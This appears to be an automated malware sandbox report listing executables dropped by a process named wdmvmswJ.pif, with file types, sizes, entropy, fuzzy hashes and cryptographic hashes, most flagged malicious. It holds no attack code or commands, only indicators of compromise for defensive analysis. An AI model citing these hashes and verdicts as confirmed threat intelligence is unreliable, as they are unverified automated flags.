                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.166362557673328
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:WwNHwoYhua6MtjRO4qbBJTY6mY1uIgWsqjnhMgeiCl7G0nehbGZpbD:WwNPdQO7BJTfmEtDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9AB293BACED92E3A8B5B0E18D878ABB4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2AB46E93DBA378B24344640C38FCE4F8F3ACC5DD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E46D2884101429DA711818B3A0845173669BAE5B42CF2B03CA9B0C5B0C1EB692
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7BEC53B6A7F0DF58F42831CA13C5F8312B303BE556518A395FB212C2FA1246EF1A58BDFF30389C7F91C04736E1476765C67233022853A5CBE63A14E10A6777DA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141864410384537
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:24lbht6BHtsqjnhMgeiCl7G0nehbGZpbD:XlNtqHRDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9D545DD231E68C6C1D32997C151A607E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:088AC26B58CA9A8A52DCC273113A5D23A1590799
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EEA6AC561C73FD871E2A8CC9200E3873E3D14AB04F7AC55E2FDC32142F688E71
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EAE411F08AD6A8DCBAEA256A93850A2A0EF38697429AC2EB479733E962B2E24921E4650D384EEED2A7CEFBB5A5CC51025BE80F40B872F383C775519CE16EDC5B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.138863266345249
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:3IkOkTB+wpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:3IxkTBVpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:76B3228EC4BC4786C393661DD270E705
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DA13244C78BBE4E1BD7ABBBDC8EF6DD210CBCC2F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:392599223A6C7CA5608CFCB6E8E2FE57ECC0AD1089E55FAC89FFFF864C10A1CF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2999E4F719828987AF977A52A4FFF421565C640DF0CE6639059D152F662AAB7A3427EDAD413220E86A530E2F2A141402C98B4BE0706AF8FDBC143F111341CAA1
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2241571316891475
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:C4lssmroCuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3k6:Ccssmr0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D80904C7F3D954B20C7E21997EDC2D1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0112DA8B638F1D7566A714BEE8F24956B1F2A5A7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:50478DC0CF29D2B6727B673EDFBE49B6A21F396924D86D19263B524E6D4F6A85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8D93CDDCB9059974BC7E7F7D99893D6A25E1B8E17BE2E9020F625AEB15FE7F12A9C0284B62291056E7DB2AD3EAEAAF93515866D51F95BE486F3363EDC1F40357
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.338535681482686
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Q03cT++foSBWU2YxhkgTsqjnhMgeiCl7G0nehbGZpbD:H3cK+foQWU2YnPXDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:08E86D654DD55B83BA77A81FA6ADAB76
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4CD59AC6963E3B9C07E28BC7C5A982DD471069F5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5FECE99390BFAAB68E866AB90123B84BC92B2C474C0E000EDD2E970B181BD4C0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:217DEFE5A3A78428C170C9E62A382F2FD77A9F41D30D1D4FFB7A43BB4C00B23C2C21DF37CDDD5E75316295FD487A6AF06D6F1EC008B4F37B51423C752D811F1E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.138907032912284
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:ubrNRzB+NzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:ubBRzBgzsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EA9600AF924B5EE0ABF7B50FBDDD9D33
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AAC4C849D5432F100CD58240E0C5469049650D77
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7C98D6303C32BA06879D1EA3D494F7986F0FB2DA757F960666E891F2AE41F529
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C0310DCFFCD147F33FD0C7AAAC6EBB959C1254A4265AFBEDC2A70A23336D590D216FFF1E45A4C66360AD41D858631A3367CC079F91B88F0C035E3D3D47F6F9A3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.940559913957733
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:Ty53w24gQu3TPZ2psFkiSqwoz1Dmg27RnWGj:TyFQgZqsFki+oz1D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E89ADFDAAFD9DEF9D3DF5727F9941FE0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AF2465D05064016B7D1E74DEAB820BCA75C7A807
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:572B79A6DD0FD4DCA960E1A2B7AAD14E574636A08F0306198AF0B0EAACF47508
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A581692032CED19E8FA4F332FE57DB87A828B4D4F9C9DB26E14166684912B6B1558513CE89CFDDF699D1DF6F9FE2534E62590C0029F7BAB9B326CE2B125291D8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.799246934186013
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:WUt0DnNaz25dB+G9wl4qstolAmo43Y6CN2Ngz3TaI:WUt0DNaK5dBn9wl4qstolAmo43Y6u2Nu
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0CD801E9F08B5692CA0A8384199FAE2D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:38ABD639FF09279D5A82D0323280560E7B70C857
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C34598E36D9FAADABA2553E2FCED51DF3AD5B40DA1FD9E1CCE496F377A0CA8D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F73159A2A042E8D1724FED821AFBB48498605C68EA201B100E2C21817AB4405AE05B789D907558F2E786A0A9805A58265786F51C88765344886502EE7DDF4404
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-01 03:23:30-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-01 03:23:30-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-01 03:23:3
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.347867247269867
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:/QVTZu0JasqjnhMgeiCl7G0nehbGZpbD:IVTZuDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6E2F1562B4D5A495EA5EE8392DBBC2E3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D3D4630483BD9107BEC7B7C6EA95C2BBF32B93AF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:37E1E3D64106BF053071AD93FEFED3A865AC6A23890C3ADA386DEB970D62C9D7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C37585F8A0A10A8F115F464D3499BA15B90F20CABD1A20120B2560D4510F6FA31F47B819CCEBBA61214213ADA456EE7513C174CFFFC3B8828837B87DB004AD9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.623164862480578
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:t+gkESfh4CohsqjnhMgeiCl7G0nehbGZpbD:UgkE+SXDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:C1AA24077FC3505FEFAA7481B77BA452
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:36AB6A84ED283AF817578AC45C9D66F4CCAECC94
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4377C700F1A8B2DC8125C3CA850680865C928313759C8B653F9E429CCA1CAA89
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9CEE5C642EA2A7CF42B34E5DF2737F284FA8D4C694FBBD1873EB220DB62307CF6C8DDA9D4DB5EF4AAAC8F0A76430F3B7DDC19721D3E42C3C772E84CCF3AF0514
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.096696245713916
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:UBpDRmi78gkPXlyo0GtjrisqjnhMgeiCl7G0nehbGZpbD:wNRmi78gkPX4o0GtjSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EBB327AEDA78374F965CD6C8CAD40AA1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0A310C46547EC171625815BB40CB825A8200C036
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4444A0D7C7826DE3BDCC552BC56A46AD69C378BCF486A8AE598E2246699B3F24
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:02C97460CA51E693F296311B6CC71DBF67FB543DF1F681E333267CD935CBB04B4BB08FAF9863BD0672E3235085B58B031F4404ECFED950B54818573E6DB63E22
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.229101649956576
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:lLOS2oTPIXVhsqjnhMgeiCl7G0nehbGZpbD:P/TKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1034B0FD43953EC495D96EE211AB53DC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8CF2561E74900F79EA9FCA109E1E18B421DD4947
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:343B547D2F9DA9FB434E91253DB7472A0D622780023566118657BF102B43E793
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:705275990467EE13A9EF1E801998565716559991646F5636439B8CA84961F2B959BCEA19033BB877C04C097511849DFA8640B5505BDDAA4A02CA7DA03BC547AE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.031202568591675
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:J1zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:J1zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:64FFBEE6349D67C5DC0DBBFF5D4C84E9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:446AEF4ED0935A21EE23800990C63A914360C020
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:051BBBB83C4AFB2E40AC334C0D0B7DBAA5283110572EC162581CA14E2407FB59
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ADD77343229360F3E49C4E7B2487EDD0AB52858F39FB06A3D5EC0C126507B17CC433190D0883A97DEA209C187EDC2D66ACAD19F6D41EB3CD261C810B08562648
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.712041875421911
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:eRudzEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eAdzEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:11CB1B9A9AD57D23937810FBD3B679E2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50CE78E8CA661427EE728E3F1E0DF126578D31AE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1A8F41F4361E6B94A8ACECCA958085F820F0AED95F318D1046D2D0603CD49EA5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D1F026420E4B51C9A31D73C90863E3F540CE420F08996DFD753F3731DB9C99BC26B0B91FDC36FF93F215C94F2E05312361DCAEBEBFD313AB88CEE1782F36CFDE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.082178683174858
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:QvoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:51CC62FB38927AE661780EEE0CFB3C65
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FAD9D0F0445FAA99D292C70D613609AFE19700AA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A88B8A6ADAC54AC34601EC058BF10C3761FD6EA050BFA2A0D0205A4ECF02CE72
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0BC2881B8FE6AC35026AE6CFDF6D4C4CFFCFE5DF7DB48B8E05AD035EF8421EE70CAEA33ADF220901918757D26E7EA9ADA4C1B41395E79CCB09B8784E3B669F14
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.468653222334574
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:K5zhM1XSENsqjnhMgeiCl7G0nehbGZpbD:QMsgDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1D712469286F74CF9753984F430552CF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8D9A72207B51ED2F01D202E5F54404AA23D1DD49
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7772279D10FCE91C0BC48F820850FF930D9CB4DBD8ED2F9C3B5DB25DD807EB3A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F61575F64F08D783B1BEA17F189D88B86C3C68F99C452669CCB18283B5835DC672BDBCA8B471EA9156E284804ADEDC2D72847C8EE510B744E96CD0663E1FB3C0
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.499806100259262
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:5tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755ODmg27RN:5jEIa4HIEWOc5cD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:FDD962728FF0887AA76F704E54B78C85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CB408CB337BA9DEDFB69A546F7D5CA2E3127D195
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5CED031BE6BC6C6B5CA9889BC8C1E5CC636354EE0FAEA0ED31DD8845E66829CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D8E71E8A13D9E064538959050757300103AA89819074895988B2CE7023899B5BBFD4B58174727DC075E322D476695D82EB32A6F2DB193B2E5C4DF88E46FE866B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9993673263725045
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:4Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:3XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EED014C07BB1996FE811430A2D15C198
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:84F3ADD386EF3B826C8C60AEEB1710A49E41FCEE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:43736EF2EDF841712CF2E8468AF098D453E745AD85283F3820F13EAB225D5CE8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C67F18DBEAEF95DC4F9D01246EDACFA39A85ECA7FA6F1121A11914AE3D27CFF2400DBB24B543632E7ADAC7B938D944F71D616759942AF533C26F51FD73B54508
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.084825372376994
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:oW4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:odsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0D6DA2D9ACCBF68FA43CFB83C9DF6C66
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:13E37D55CA3F4CF177ECFF2E3E15A64DBC4835FA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F20749A4421F28DDD6B31154EB2355422613FE6BB6EA7FEAAF689822A0C6A45E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B9BF5058A09DCC7E631A2597CF3C1478BC1E71824AF58EC96EFC5BCB05290D807DF72D71CDC5B6F14F10BCDCE0AF75DEAE413DB6E7638565991C41CCF01FEFE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.386721709499713
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:RDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXk:inN9KfxLk6GEQTX5UKzNDPD527BWG
